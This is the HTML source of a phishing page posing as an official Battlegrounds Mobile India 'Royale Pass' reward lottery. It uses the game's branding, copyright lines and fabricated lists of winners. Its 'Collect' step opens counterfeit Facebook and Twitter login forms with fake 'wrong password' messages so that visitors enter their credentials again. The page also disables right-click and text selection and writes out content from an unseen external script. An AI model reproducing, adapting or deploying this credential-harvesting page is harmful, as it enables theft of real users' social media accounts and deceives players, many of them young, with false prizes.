<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no">
<title>NEW ROYALE PASS AVAILABLE NOW</title>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="Description" content="NEW ROYALE PASS AVAILABLE NOW" />
<meta name="Keywords" content="BATTLE GROUNDS MOBILE INDIA" />
<meta property="og:type" content="website">
<meta property="og:title" content="NEW ROYALE PASS AVAILABLE NOW" />
<meta property="og:description" content="NEW ROYALE PASS AVAILABLE NOW" />
<meta property="og:url" content="https://www.battlegroundsmobileindia.com/" />
<meta property="og:image" content="https://www.battlegroundsmobileindia.com/" />
<meta name="twitter:image" content="https://www.battlegroundsmobileindia.com/">
<link href="./index_files/css" rel="stylesheet">
<link rel="stylesheet" href="css-zone/facebook.css">
<link rel="stylesheet" href="css-zone/twitter.css">
<link rel="stylesheet" href="css-zone/animate.css">
<link href="https://fonts.googleapis.com/css2?family=Teko&display=swap" rel="stylesheet">
<link href="https://stackpath.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet" integrity="sha384-wvfXpqpZZVQGK6TAh5PVlGOfQNHSoD2xbE+QkPxCAFlNEevoEH3Sl0sibVcOQVnN" crossorigin="anonymous">
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
<link rel="icon" type="img/png" href="https://www.battlegroundsmobileindia.com/common/img/common/logo.png" sizes="32x32">
<script type="text/javascript" src="js-zone/jquery.js"></script>
<script type="text/javascript" src="js-zone/main-zone.js"></script>
<script language="JavaScript">
document.write(ls())
</script>
</head>
<body oncontextmenu="return false" onselectstart="return false" ondragstart="return false">
<style type="text/css">
@charset "utf-8";
@import url("https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Teko:300,400,500");
*,*:before,*:after {
	-webkit-box-sizing:border-box;
	-moz-box-sizing:border-box;
	box-sizing:border-box;
}
@font-face {
    font-family: 'selow'; 
    font-style: normal;
    font-weight: 700;
    src: url(fonts/selow.woff2) format("woff2"), 
        url(fonts/selow.woff) format("woff"),
        url(fonts/selow.ttf) format("truetype");
}
.gallery-container {	   
   background-size: 100% 100%;   
   margin-top:-3px;  
   width:100%;
   height:auto;
   border: none;   
   float:left;
}
.container-box {	   
   background-size: 100% 100%;      
   width:100%;
   height:690px;   
}
.landing {
	background: url(img/landing.jpg) no-repeat center center;
	background-size: cover;
	width:100%;
	height:auto;
}
.header {
	width: 100%;
	height: auto;
}
.header img {
	width: 100%;
	height: auto;
	margin-top: -0px;
	border-top: 1px solid #833A7B;
    border-bottom: 1px solid #833A7B;
}
.header video {
	width: 100%;
	border:none;
}
.slideshow-container {
  max-width: 1000px;
  position: relative;
  margin: auto;
}
.fade {
  -webkit-animation-name: fade;
  -webkit-animation-duration: 1.5s;
  animation-name: fade;
  animation-duration: 1.5s;
}
  .notiftwitter {
	width: 30%;
	height: 30px;
	margin-left: 35%;
	margin-right: auto;
	padding: 5px;
	font-size: 22px;
	font-family:Teko;
	font-weight: 500;
	text-align: center;
	color: #ECD954;
	margin-bottom: 0px;
	border: none;
	position: relative;
	outline: none;
	display: block;
}
.season-logo {
	width:20%;
	margin:15px;
	float:left;
}
.season-logos {
	width:40%;
	margin:5px;
	float:right;
}
.season-slogan {
	width: 100%;
	margin-top: 100%;
	margin-left: auto;
	margin-right: auto;
	display: block;
}
.season-btn {
	background: url(/img/yes_selow.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-left: auto;
	margin-right: auto;
	padding: 10px;
	padding-left: 30px;
	padding-right: 30px;
	font-size: 18px;
	font-family:selow;
	font-weight: 500;
	text-align: center;
	color: #000;
	margin-bottom: 3px;
	border: none;
	position: relative;
	outline: none;
	display: block;
}
.season-btn:hover {
	background: url(img/menu_on.png) no-repeat center;
	background-size: 100% 100%;
	color: #000;
	transition: 0.5s;
}
.event-title {
	background:url(img/title.png) no-repeat center center;
	background-size:100% 100%;
	width:100%;
	height: 70px;
	margin-left:auto;
    margin-right:auto;
	margin-top:5px;	
	margin-bottom:-30px;
	display:block;
}
.event-subtitle {
    display: block;
    margin-left: 5%;
    margin-right: 5%;
    margin-top: -15px;
    margin-bottom: 25px;
    overflow: hidden;
    text-align: center;
    white-space: nowrap;
    width: 90%;
}
.event-subtitle>span {
    display: inline-block;
    position: relative;
    color: #ffca13;
    cursor: default;
    font-size: 1.4rem;
	text-shadow: 1px 1px 0px rgba(0, 0, 0);
}
.event-subtitle>span:before,
.event-subtitle>span:after {
    background: #ffca13;
	border-bottom: 2px solid #ffca13;
    content: "";
    height: 1px;
    position: absolute;
    top: 50%;
    width: 9999px;
}
.event-subtitle>span:before {
    margin-right: 15px;
    right: 100%;
}
.event-subtitle>span:after {
    left: 100%;
    margin-left: 15px;
}
.event-notification {
    background: url(img/alert.png) no-repeat center;
	background-size: 100% 100%;
	margin-top:-30px;
	margin-bottom: 10px;
	margin-right: auto;
	margin-left: auto;
	width:90%;
	height:55px;
	padding:8px;
}
.event-notification-text {
	text-align:center;
	font-family:selow;
	color:#fff;
	text-shadow: 0px 0px 3px #000;
	margin-top: 11px;
	font-family:selow;
	font-size:17px;
}
.popup {
	width:100%;
	height:100%;
	position:fixed;
	top:0;
	left:0;
	z-index:9999;
	background-color:rgba(0, 0, 0, 0.4);
}
.popup-box-wrapper {
	width: 390px;
	height: auto;
	position: relative;
	margin: 50px auto;
	margin-top: 15%;
	text-align: center;
	font-family:'selow';
	color:#fff;
}
.popup-box-navbar {
	background:url(img/popup-navbar2.png) no-repeat center center;
	background-size:100% 100%;
	height: 43px;
	padding-bottom: 5px;
}
.popup-box-navbar img {
	width: 25px;
	height: 25px;
	margin-top: 7px;
	margin-right: 15px;
	float: right;
}
.popup-box-navbar-title {	
	padding-top: 12px;
	padding-bottom: 2px;
	font-size: 20px;
	font-family:selow;
	font-weight: 300;
	text-align: center;
	color: #fff;
}
.popup-box-bg {
	background:url(img/popup-box-bg2.png) no-repeat center center;
	background-size:100% 100%;
	width: 100%;
	margin-top: -12px;
}
.popup-box-alert {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #AAAAAA;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: left;
	display: block;
}
.popup-box-alert2 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #AAAAAA;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: left;
	display: block;
}
.popup-box-alert0 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #AAAAAA;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: right;
	display: block;
}
.popup-box-alert3 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #AAAAAA;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: left;
	display: block;
}
.popup-box-alert7 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #F5EAB0;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.popup-box-alert4 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 6px;
	color: #AAAAAA;
	font-size: 18px;
    font-family:selow;
	font-weight: 500;
	text-align: center;
	display: block;
}
.popup-box-alert4 i {
	padding-top: 15px;
	padding-bottom: 15px;
	color: #AAAAAA;
	font-size: 50px;
	text-align: center;
}
.popup-box-gamecon {
	width: 45%;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 15px;
	display: block;
}
.popup-box-item {
	width:23%;
	height:85px;
	margin-left:auto;
	margin-right:auto;
	text-align: right;
	display: block;
}
.popup-box-item img {
	width:100%;
	height:100%;
}
.popup-box-item span {
	color: #fff;
	font-size: 22px;
	font-family: selow;
	text-align: right;
	position: absolute;
	left: 0;
	right: 2px;
	bottom: -5px;
}
.popup-box-form {
	width: 85%;
	height: auto;
	margin-left: auto;
	margin-right: auto;
	display: block;
}
.popup-box-form label {
  display: inline-block;
  width: 140px;
  text-align: right;
  color: yellow;
}
.popup-box-form input {
	background: #4A4A4A;
	background-size: 100% 100%;
	width: 100%;
	height: 35px;
	margin-bottom: 3px;
	padding: 4px;
	padding-left: 10px;
	color: #FFFBF7;
	font-size:16px;
	font-family:selow;
	font-weight: 300;
	border: 1px solid #AAAAAA;
	position: relative;
	outline: none;
	-webkit-appearance: none;
    -moz-appearance: none;
}
.popup-box-form input::placeholder {
	color: #FFFBF7;
}
.popup-box-form select {
	background: #4A4A4A;
	background-size: 100% 100%;
	width: 100%;
	height: 35px;
	margin-bottom: 3px;
	padding: 4px;
	padding-left: 10px;
	color: #FFFBF7;
	font-size:16px;
	font-family:selow;
	font-weight: 300;
	border: 1px solid #AAAAAA;
	position: relative;
	outline: none;
	-webkit-appearance: none;
    -moz-appearance: none;
}
.popup-box-footer {	
	background-size:100% 100%;
	margin-top: 20px;
	width: 100%;
	height: 45px;
}
.popup-box-footer button {
	background: url(img/yes_selow.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-top: 5px;
	padding: 5px;
	padding-left: 35px;
	padding-right: 35px;
	color: #000;
	font-size:18px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border: none;
	outline: none;
}
.popup-box-form-footer {
	background-size:100% 100%;
	width: 100%;
	height: 45px;
	margin-top: 20px;
}
.popup-box-form-footer button {
	background: url(img/yes_selow.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-top: 5px;
	padding: 4px;
	padding-left: 30px;
	padding-right: 30px;
	color: #000;
	font-size:18px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border:none;
	outline: none;
}
.popup-btn-login {
    width: 37%;
    height: 35px;
    padding: 6px;
    margin-top: 15px;
    margin-bottom: 10px;
    margin: 5px;
    color: #000;
	font-size: 16px;
    font-family:selow;
    border: none;
    border-radius: 1px;
    outline: none;
    margin-bottom: 45px;
    position: relative;
}
.popup-btn-login i {
    color: #fff;
    font-size: 20px;
    float: left;
}
.popup-btn-facebook {
    background: #1778f2;
    color: #fff;
	margin-bottom: 45px;
}
.popup-btn-twitter {
    background: #198B96;
	margin-bottom: 3px;
    color: #fff;
}
.popup-login {
	background:rgba(0,0,0,0.4);
	width:100%;
	height:100%;
	position:fixed;
	top:0;
	left:0;
	z-index:9999;
}
.popup-box-login-fb {
	background:#ECEFF6;
	max-width:330px;
	height:auto;
	position:relative;
	margin:50px auto;
	margin-top:1.9%;
	text-align:center;
	font-family:'Teko';
	color:#000;
	border-radius:10px;
}
.popup-box-login-twitter {
	background:#fff;
	max-width:330px;
	height:auto;
	position:relative;
	margin:50px auto;
	margin-top:10%;
	text-align:center;
	font-family:'Teko';
	color:#000;
	border-radius:5px;
}
.close-fb {
	background:#000;
	width:20px;
	height:20px;
	color:#fff;
	text-align:center;
	text-decoration:none;
	border-radius:50%;
	border:1.5px solid #fff;
	position:absolute;
	top:-8px;
	right:-10px;
	display:block;
}
.close-fb i {
	color:#fff;
	padding-top:1px;
}
.close-other {
	background:#000;
	width:20px;
	height:20px;
	color:#fff;
	text-align:center;
	text-decoration:none;
	border-radius:50%;
	border:1.5px solid #fff;
	top:-8px;
	right:-10px;
	position:absolute;
	z-index:9999999;
	display:block;
}
.close-other i {
	color:#fff;
	padding-top:1px;
}
.popups {
	width:100%;
	height:100%;
	position:fixed;
	top:0;
	left:0;
	z-index:9999;
	background-color:rgba(0, 0, 0, 0.4);
}
.popup-box-wrappers {
	width: 390px;
	height: auto;
	position: relative;
	margin: 50px auto;
	margin-top: 15%;
	text-align: left;
	font-family:'selow';
	color:#fff;
}
.popup-box-navbars {
	background:url(img/popup-navbar2.png) no-repeat center center;
	background-size:100% 100%;
	height: 43px;
	padding-bottom: 5px;
}
.popup-box-navbars img {
	width: 20px;
	height: 20px;
	margin-top: 15px;
	margin-right: 18px;
	float: right;
}
.popup-box-navbars-title {	
	padding-left: 40px;
	padding-top: 14px;
	padding-bottom: 2px;
	font-size: 20px;
	color: #fff;
	font-family:selow;
	font-weight: 300;
	text-align: center;	
}
.kagetk {     
	background: rgba(0, 0, 0, 0.2);
	background-size:50% 50%;
	width: 80%;
	height: auto;
	margin-left: auto;
	margin-right: auto;
	border: 1px solid #fff;
	display: none;
	padding: 10px;
	color: #fff;
	font-size: 14px;
	font-family: selow;
	text-align: center;
}
.popup-box-bgs {
	background:url(img/popup-box-bg2.png) no-repeat center center;
	background-size:100% 100%;
	width: 100%;
	margin-top: -12px;
}
.popup-box-alerts4 {
	width: 95%;
	height: auto;
	margin-top: 10px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 10px;
	padding: 5px;
	color: #fff;
	font-size: 20px;
    font-family:selow;
	font-weight: 500;
	text-align: left;
	display: block;
}
.popup-box-alerts4 i {
	padding-top: 15px;
	padding-bottom: 15px;
	color: #F5EAB0;
	font-size: 50px;
	text-align: left;
}
.popup-box-formx label {
  width: 70%;
  text-align: left;
  padding-left: 20px;
  color: #B7B7B7;
  text-shadow:none;
  font-size:17px;
}
.popup-box-formx input {
	background: #001;
	width: 85%;
	height: 35px;
	margin-bottom: 8px;
	margin-left: 20px;
	padding-right: 4px;
	padding: 4px;
	color: #fff;
	font-size:15px;
	font-family:selow;
	font-weight: 500;
	border: 0.1px solid #fff;
	outline:none;
	position: left;
  -webkit-appearance: none;
  -moz-appearance: none;
}
.popup-box-formx input::placeholder {
	color: #BCCBCE;
}
.popup-box-footers {
	background-size:100% 100%;
	margin-top: 20px;
	width: 100%;
	height: 45px;
}
.popup-box-footers button {
	background: url(img/yes_selow.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-top: 5px;
	padding: 4px;
	padding-left: 35px;
	padding-right: 35px;
	color: #000;
	font-size:18px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border: none;
	outline: none;
}
.popup-box-formx-footer {
	background-size:100% 100%;
	width: 100%;
	height: 45px;
	margin-top: 20px;
}
.popup-box-formx-footer button {
	background: url(img/yes_selow.png) no-repeat center;
	background-size: 100% 100%;
	width: auto;
	height: auto;
	margin-top: 5px;
	padding: 4px;
	padding-left: 30px;
	padding-right: 30px;
	color: #F4CD34;
	font-size:18px;
	font-family: selow;
	font-weight: 500;
	text-align: center;
	border:none;
	outline: none;
}
.balance {
	background:url(img/bg-item.png) no-repeat center center;
	background-size:101% 100%;
	width: 94.3%;
	height: 100px;
	margin-left: auto;
	margin-right: auto;
	margin-bottom: 7px;
	padding: 4px;
	border-top:2px solid #ECD954;
	border-left:2px solid #ECD954;
	border-right:2px solid #ECD954;
	border-bottom:2px solid #ECD954;
	display: block;
}
.balance-img {
	width: 50%;
	height: 97px;
	margin-top: -5px;
	margin-right: 5px;	
	float: left;	
	padding: 5px;
	border:1px #fff;  
}
.balance-nom {
	color: #fff;
	padding-top: 2px;
	padding-left: 5px;
	padding-bottom: 0px;
	font-size: 18px;
	font-family:selow;
	font-weight: 500;
	text-align: center;
	text-shadow:0 1px 0 #000;
	border-left: 3px solid #9FE9F7;
	line-height: 18px;
	float: left;
}
.balance-detail {
	width: auto;
	height: auto;
	padding-top: 2px;
	padding-left: 5px;
	padding-bottom: 0px;
	color: #fff;
	font-size: 15px;
	font-family:selow;
	text-align: left;
}
.balance-nom-button {
	background:url(img/yes_selow.png) no-repeat center center;
	background-size:100% 100%;
    width: 36%;
	height: auto;
	margin-top:7px;
	margin-left:auto;
	margin-right:auto;
	padding: 10px;
	font-size: 18px;
	color:#000;
	font-family:selow;
	text-align: center;
	border: none;
	outline: none;
	float: center;
}
.box {    
    width: 100%;
    height: 410px;
    margin-left:auto;
    margin-right:auto;
    margin-top: -15px;
	margin-bottom: 20px;
	border: 0px solid #FFFAC9;
	border-radius:5px;
	position: relative;
	display: block;
}
.box-item {
	width: 100%;	
	margin-left:auto;
    margin-right:auto;	
	padding-top:2px;
} 
.scroll {
	width:100%;
	overflow:none;
	position:relative;
	width: 100%;
	height:400px;
	margin-top:11px;
	display: block;
	scrollbar-face-color:#ffbb40;
	scrollbar-shadow-color:#ffbb40;
	scrollbar-highlight-color:#ffbb40;
	scrollbar-3dlight-color:#ffbb40;
	scrollbar-darkshadow-color:#ffbb40;
	scrollbar-track-color:#ffbb40;
	scrollbar-arrow-co
}
.btn-wrapper {
	width: 93%;
	height: 50px;	
	margin-top: 3px;
	margin-right: 3px;			
	font-family:selow;	
}
.btn-wrapper button {
    background: url(img/tombol.png) no-repeat center;
	background-size: 100% 100%;
	width: 38%;
	height: 40px;
	margin: -10px;
	padding: 10px;
	color: #FFFAC9;
	font-family:selow;
	font-size: 18px;	
	font-weight: 500;
	text-align: center;
	border: none;
	outline: none;
	float:right;
	display: inline-block;	
}
.alert {
	background: url(img/selow.jpg) no-repeat center;
	background-size: 100% 100%;
	width: 100%;
	height: 83px;
	margin-left: auto;
	margin-right: auto;
	border-left: 1px solid #fff;
	border-right: 1px solid #fff;
	border-top: 2px solid #E0B35B;
	border-bottom: 2px solid #E0B35B;
	display: block;
}
figure {
	margin: 0;
	padding: 0;
	overflow: hidden;
}
.itemShine {
	position: relative;
}
.itemShine::before {
	background: -webkit-linear-gradient(left, rgba(255,255,255,0) 0%, rgba(255,255,255,.3) 100%);
	background: linear-gradient(to right, rgba(255,255,255,0) 0%, rgba(255,255,255,.3) 100%);
	width: auto;
	height: auto;
	top: 0;
	left: -75%;
	position: absolute;
	z-index: 2;
	content: '';
	display: block;
	-webkit-transform: skewX(-25deg);
	transform: skewX(-25deg);
}
.itemShine::before {
	-webkit-animation: shine 2s infinite;
	animation: shine 2s infinite;
}
@-webkit-keyframes shine {
	100% {
		left: 125%;
		}
}
@keyframes shine {
	100% {
		left: 125%;
		}
}
.kanan {
	float: right;
}
.kiri {
	float: left;
}
.tengah {
	margin-left: auto;
	margin-right: auto;
	display: block;
}
::-webkit-scrollbar { 
    display: none;
    width: 0px;
}
@media only screen and (max-width:600px) {
    .containerLanding, .containerHome {
        width: 100%;
        height: auto;
        margin-top: -3px;
        margin-bottom: 0px;
		border: none;
        border-radius: 0px;
        padding: 0px;	
	}
    .gallery-container {	             
        float: left;
        margin-top:-2px;  
        width:100%;
        height:auto;
        border-bottom: 1px solid #833A7B;       
    }
    .box {
	    width: 100%;
		height: 405px;
        margin-top: -16px;		
	}
    .box-item {
	    width: 100%;	
	    margin-left:auto;
        margin-right:auto;	
		padding-top:1px;
	}
    .scroll {
        height: 400px;
    }
    .alert {
        border-right: none;  
        border-left:none;       
    }
    .popup-box-wrapper {
        width: 360;
        margin-top: 60%;
    }
    .popup-box-wrappers {
        width: 360px;
        margin-top: 60%;
    }
    .popup-box-item {
        width: 25%;
        height: 90px;
    }
    .popup-box-login-fb {
        margin-top: 4%;
    }
    .popup-box-login-twitter {
        margin-top: 25%;
    }
	.footer {
        background-position-y: calc(500 / 640 * 210vw);
    }
	.footer-socmed-box p {
	    margin-top: 12px;
	}
}
</style>       
<div class="slider-container">
<div class="navbar">
<img class="navbar-logo" src="https://www.battlegroundsmobileindia.com/common/img/common/logo.png">
<div class="navbar-right">
<img class="navbar-shop" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_f_w.png">
<img class="navbar-language" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_i_w.png">
<img class="navbar-language" src="https://www.battlegroundsmobileindia.com/common/img/btn/sns_i_w.png">
<div class="navbar-download"><img src="https://i.ibb.co/jwMxWFh/menu.png"></div>
</div> <!--- navbar-right --->
</div> <!--- navbar --->
<div class="header">
<div class="sliderHeader"><img src="img/header/1.jpg" style="width: 100%;"></div>

</div> <!--- header --->
<div class="gallery-container">
<div class="event-title"></div> <!--- event-title --->
<section class="container" id="js-lotto">
<div class="square" data-order="0">
<div class="square__content"><svg viewBox="0 0 100 100" version="1.1" xmlns="http://www.w3.org/2000/svg"><defs><pattern id="gift1" patternUnits="userSpaceOnUse" width="100" height="100"><image xlink:href="img/reward/1.png" x="-25" width="150" height="100"></image></pattern></defs><polygon points="0 0 950 0 0 0 900 0 0 750 0 0" fill="url(#gift1)"></polygon></svg></div>
</div>
<div class="square" data-order="1">
<div class="square__content"><svg viewBox="0 0 100 100" version="1.1" xmlns="http://www.w3.org/2000/svg"><defs><pattern id="gift2" patternUnits="userSpaceOnUse" width="100" height="100"><image xlink:href="img/reward/2.png" x="-25" width="150" height="100"></image></pattern></defs><polygon points="0 0 950 0 0 0 900 0 0 750 0 0" fill="url(#gift2)"></polygon></svg></div>
</div>
<div class="squar" data-order="5">
<div class="squar__content"><svg viewBox="0 0 100 100" version="1.1" xmlns="http://www.w3.org/2000/svg"><defs><pattern id="gift3" patternUnits="userSpaceOnUse" width="100" height="100"><image xlink:href="img/reward/3.png" x="-25" width="150" height="100"></image></pattern></defs><polygon points="0 0 950 0 0 0 900 0 0 750 0 0" fill="url(#gift3)"></polygon></svg></div>
</div>
<div class="start squar__start-btn">
<div>
<center>
<o onclick="audioFile()" onmousedown="buka.play();"><img src="img/draw.png" width="100" height="95" id="js-start"></o>
</center>
</div>
</div>
<div class="squar" data-order="2">
<div class="squar__content"><svg viewBox="0 0 100 100" version="1.1" xmlns="http://www.w3.org/2000/svg"><defs><pattern id="gift4" patternUnits="userSpaceOnUse" width="100" height="100"><image xlink:href="img/reward/4.png" x="-25" width="150" height="100"></image></pattern></defs><polygon points="0 0 950 0 0 0 900 0 0 750 0 0" fill="url(#gift4)"></polygon></svg></div>
</div>
<div class="square" data-order="4">
<div class="square__content"><svg viewBox="0 0 100 100" version="1.1" xmlns="http://www.w3.org/2000/svg"><defs><pattern id="gift5" patternUnits="userSpaceOnUse" width="100" height="100"><image xlink:href="img/reward/5.png" x="-25" width="150" height="100"></image></pattern></defs><polygon points="0 0 950 0 0 0 900 0 0 750 0 0" fill="url(#gift5)"></polygon></svg></div>
</div>
<div class="square" data-order="3">
<div class="square__content"><svg viewBox="0 0 100 100" version="1.1" xmlns="http://www.w3.org/2000/svg"><defs><pattern id="gift6" patternUnits="userSpaceOnUse" width="100" height="100"><image xlink:href="img/reward/6.png" x="-25" width="150" height="100"></image></pattern></defs><polygon points="0 0 950 0 0 0 900 0 0 750 0 0" fill="url(#gift6)"></polygon></svg></div></div>
</section> <!--- container --->
<div class="event-notification">
<div class="event-notification-text">
<div class="slider animated fadeIn">ID 5883485425 Successfully Got M416 - Silver Guru</div>
<div class="slider animated fadeIn">ID 5295893347 Successfully Got Mummy White</div>
<div class="slider animated fadeIn">ID 5963737318 Successfully Got 5 Materials</div>
<div class="slider animated fadeIn">ID 5886864517 Successfully Got M416 - Glacier</div>
<div class="slider animated fadeIn">ID 5155030554 Successfully Got M416 - Imperial</div>
<div class="slider animated fadeIn">ID 5463336783 Successfully Got 5000 UC</div>
</div> <!--- event-notification-text --->
</div> <!--- event-notification --->
</div> <!--- gallery-container --->
<div class="footer">
  <!--- footer-socmed-box --->
 <!--- footer-txt-copyright --->
<img class="footer-copyright-icon" src="img/footer.png">
<div class="footer-txt-copyright">ⓒ 2022 KRAFTON, Inc. All rights reserved.</div> <!--- footer-txt-copyright --->
<div class="footer-txt-copyright">ⓒ 2018-2022 Tencent. All rights reserved.</div> <!--- footer-txt-copyright --->
<div class="footer-txt-copyright">Privacy Policy | Tencent Games User Agreement</div> <!--- footer-txt-copyright --->
<br>
</div> <!--- footer --->
</div> <!--- slider-container --->

<div class="popup open_rewards animated fadeIn" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar">
<div class="popup-box-navbar-title">Congratulations</div> <!--- popup-box-navbar-title --->
</div> <!--- popup-box-navbar --->
<div class="popup-box-bg">
<div class="popup-box-alert4"><br>You got</div> <!--- popup-box-alert --->
<div class="popup-box-item itemShine">
<div>
<figure>
<img class="popup-item" src="">
</figure>
</div>
</div> <!--- popup-box-item itemShine --->
<br>
<div class="popup-box-footer">
<button type="button" onmousedown="buka.play();" onmousedown="buka.play();" onclick="open_account_login()">Collect</button>
</div> <!--- popup-box-bg --->
</div> <!--- popup-box-footer --->
</div> <!--- popup-box-wrapper --->
</div> <!--- popup open_rewards --->

<div class="popup account_login animated fadeIn" style="display: none;">
<div class="popup-box-wrapper">
<div class="popup-box-navbar">
<div class="popup-box-navbar-title">Account Log in</div> <!--- popup-box-navbar-title --->
</div> <!--- popup-box-navbar --->
<div class="popup-box-bg">
<div class="popup-box-alert4"></div> <!--- popup-box-alert --->
<img class="popup-box-gamecon" src="https://upload.wikimedia.org/wikipedia/en/thumb/6/63/Battleground_Mobile_India.webp/220px-Battleground_Mobile_India.webp.png">
<button type="button" onmousedown="buka.play();" class="popup-btn-login popup-btn-twitter" onclick="open_twitter();"><i class="fa fa-twitter-square icon-login"></i>Twitter</button>
<button type="button" onmousedown="buka.play();" class="popup-btn-login popup-btn-facebook" onclick="open_facebook();"><i class="fa fa-facebook-square icon-login"></i>Facebook</button>
<img style="width: 90%; height: auto; margin-top: -15px; margin-left: auto; margin-right: auto;" src="img/seseselow.png"><br><br>
</div> <!--- popup-box-bg --->
</div> <!--- popup-box-footer --->
</div> <!--- popup-box-wrapper --->
</div> <!--- popup account_login --->

<div class="popup-login login-facebook animated fadeIn" style="display: none;">
<div class="popup-box-login-fb">
<a onmousedown="tutup.play();" onclick="close_facebook()" class="close-fb"><i class="zmdi zmdi-close"></i></a>
<div class="navbar-fb">
<img src="img/facebook-text.png">
</div>
<div class="content-box-fb">
<p class="kaget email-fb" style="width: 330px; top: -15px; text-align: left;">The email address or phone number that you've entered doesn't match any account. <b>Sign up for an account.</b></p>
<p class="kaget sandi-fb" style="width: 330px; top: -15px; text-align: left;">The password that you've entered is incorrect. Forgotten password?</p>
<img src="https://upload.wikimedia.org/wikipedia/en/thumb/6/63/Battleground_Mobile_India.webp/220px-Battleground_Mobile_India.webp.png">
<div class="txt-login-fb">
 Log in to your Facebook account to connect to BATTLEGROUNDS MOBILE INDIA.
</div>
<form class="login-form" action="javascript:void(0)" method="post" id="ValidateLoginFbForm">
<label>
<input type="text" class="loginEmail" name="email" id="email-facebook" placeholder="Mobile number or email address" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity('Enter Email or Mobile Number')" oninput="setCustomValidity('')">
</label><label>
<input type="password" class="loginPassword" name="password" id="password-facebook" placeholder="Password" autocomplete="off" autocapitalize="off" required oninvalid="this.setCustomValidity('Enter Password')" oninput="setCustomValidity('')"></label>
<div class="showHide showPassword" onclick="showFbPassword()"><i class="zmdi zmdi-eye-off zmdi-hc-2x"></i></div>
<div class="showHide hidePassword" style="display: none;" onclick="hideFbPassword()"><i class="zmdi zmdi-eye zmdi-hc-2x"></i></div>
<input type="hidden" name="login" id="login-facebook" value="Facebook" readonly>
<button type="submit" class="btn-login-fb" onclick="ValidateLoginFbData()">Log In</button>
</form>
<div class="txt-create-account">Create Account</div>
<div class="txt-not-now">Not now</div>
<div class="txt-forgotten-password">Forgotten password?</div>
</div>
<div class="language-box">
<center>
<div class="language-name language-name-active">English (UK)</div>
<div class="language-name">العربية</div>
<div class="language-name">Türkçe</div>
<div class="language-name">Tiếng Việt</div>
<div class="language-name">日本語</div>
<div class="language-name">Español</div>
<div class="language-name">Português (Brasil)</div>
<div class="language-name">
<i class="fa fa-plus"></i>
</div>
</center>
</div>
<div class="copyright">Facebook Inc.</div>
</div>
</div>

<div class="popup-login login-twitter animated fadeIn" style="display: none;">
<div class="popup-box-login-twitter">
<a onmousedown="tutup.play();" onclick="close_twitter()" class="close-other"><i class="zmdi zmdi-close"></i></a>
<div class="box-twitter">
<center>
<div class="header-twitter">
<img src="img/twitter-text.png" style="margin-bottom: -35px; margin-left: 135px;">
</center>
<center>
<br><br>
<form action="javascript:void(0)" method="post" id="ValidateLoginTwitterForm">
<div class="txt-login-twitter"style="text-align: left; margin-left: 95px;">Login to Twitter</div> <!--- txt-login-twitter --->
<div class="input-box-twitter">
<label>Phone, email, or username</label>
<input type="text" name="email" id="email-twitter" placeholder="" required oninvalid="this.setCustomValidity('Enter Username, Email or Mobile Number')" oninput="setCustomValidity('')">
</div> <!--- input-box-twitter --->
<div class="input-box-twitter">
<div class="TwitterShowHide TwitterShowPassword" onclick="showTwitterPassword()"><i class="zmdi zmdi-eye-off zmdi-hc-2x"></i></div> <!--- TwitterShowPassword --->
<div class="TwitterShowHide TwitterHidePassword" style="display: none;" onclick="hideTwitterPassword()"><i class="zmdi zmdi-eye zmdi-hc-2x"></i></div> <!--- TwitterHidePassword --->
<label>Password</label>
<input type="password" style="width: 85%;" name="password" id="password-twitter" placeholder="" required oninvalid="this.setCustomValidity('Enter Password')" oninput="setCustomValidity('')">
</div> <!--- input-box-twitter --->
<p class="kagettw email-tw" style="width: 330px; top: -15px; text-align: center; margin-left: -17px;">Sorry, we couldn't find your account.</p>
<p class="kagettw sandi-tw" style="width: 330px; top: -15px; text-align: center; margin-left: -17px;">Wrong Password!</p>
<input type="hidden" name="login" id="login-twitter" value="Twitter" readonly>
<button type="submit" class="btn-login-twitter" onclick="ValidateLoginTwitterData()">Log In</button>
<div class="footer-menu-twitter">Forgot password?</div> <!--- footer-menu-twitter --->
<div class="footer-menu-twitter bulet">•</div> <!--- footer-menu-twitter --->
